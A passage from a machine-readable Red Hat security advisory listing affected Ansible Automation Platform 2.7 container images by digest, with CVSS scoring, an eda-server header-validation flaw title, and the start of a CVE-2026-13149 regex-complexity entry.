"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "eda-server: ExternalEventStreamViewSet trusts Subject header without validation and leaks expected DN"
},
{
"cve": "CVE-2026-13149",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-06-30T10:00:59.843854+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
